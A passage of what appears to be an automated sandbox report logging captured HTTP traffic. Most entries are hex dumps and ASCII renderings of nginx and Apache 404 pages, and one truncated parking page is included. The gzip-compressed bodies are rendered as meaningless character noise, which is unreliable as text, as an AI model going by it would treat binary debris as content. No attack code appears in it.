64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 06:02:41 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 06:02:44 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 06:02:47 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 06:02:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 24 Oct 2024 06:02:56 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 45 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a8 69 9b c3 50 6b d1 f8 b3 c8 b8 6a 3a df bf 73 45 b8 5e 6a e3 ba 67 c6 d1 6e 21 e2 ce 0f 4f 2f 69 05 24 93 60 37 e0 bd 18 11 47 7d d6 e6 86 96 ee 70 3d 9e c4 4a f4 d1 7e 4b a4 ce db 86 0d 99 ac 0d 39 7c 73 64 fa 7e 41 46 f1 7f 71 a0 16 aa 6c 45 c9 4e 7e 61 f4 47 cf 19 8c 06 a1 f6 90 ef 60 64 4d 9e 04 51 64 51 6a be fc 33 6b 3d c9 75 13 15 a6 e9 8e d1 b9 fe 35 8f 86 5e 4f 6a 9d 0b 47 5a 4d 2a 6d 1d 30 ec d9 c6 d1 e7 f4 3e 7d 7c e8 29 6f 6e cf f1 8c a2 ee 3a 93 27 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ed 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9d a7 e3 e7 f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 24 Oct 2024 06:02:58 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 45 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a8 69 9b c3 50 6b d1 f8 b3 c8 b8 6a 3a df bf 73 45 b8 5e 6a e3 ba 67 c6 d1 6e 21 e2 ce 0f 4f 2f 69 05 24 93 60 37 e0 bd 18 11 47 7d d6 e6 86 96 ee 70 3d 9e c4 4a f4 d1 7e 4b a4 ce db 86 0d 99 ac 0d 39 7c 73 64 fa 7e 41 46 f1 7f 71 a0 16 aa 6c 45 c9 4e 7e 61 f4 47 cf 19 8c 06 a1 f6 90 ef 60 64 4d 9e 04 51 64 51 6a be fc 33 6b 3d c9 75 13 15 a6 e9 8e d1 b9 fe 35 8f 86 5e 4f 6a 9d 0b 47 5a 4d 2a 6d 1d 30 ec d9 c6 d1 e7 f4 3e 7d 7c e8 29 6f 6e cf f1 8c a2 ee 3a 93 27 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ed 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9d a7 e3 e7 f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 24 Oct 2024 06:03:01 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 45 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a8 69 9b c3 50 6b d1 f8 b3 c8 b8 6a 3a df bf 73 45 b8 5e 6a e3 ba 67 c6 d1 6e 21 e2 ce 0f 4f 2f 69 05 24 93 60 37 e0 bd 18 11 47 7d d6 e6 86 96 ee 70 3d 9e c4 4a f4 d1 7e 4b a4 ce db 86 0d 99 ac 0d 39 7c 73 64 fa 7e 41 46 f1 7f 71 a0 16 aa 6c 45 c9 4e 7e 61 f4 47 cf 19 8c 06 a1 f6 90 ef 60 64 4d 9e 04 51 64 51 6a be fc 33 6b 3d c9 75 13 15 a6 e9 8e d1 b9 fe 35 8f 86 5e 4f 6a 9d 0b 47 5a 4d 2a 6d 1d 30 ec d9 c6 d1 e7 f4 3e 7d 7c e8 29 6f 6e cf f1 8c a2 ee 3a 93 27 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ed 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9d a7 e3 e7 f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1271Connection: closeDate: Thu, 24 Oct 2024 06:03:03 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 2
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 06:03:47 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
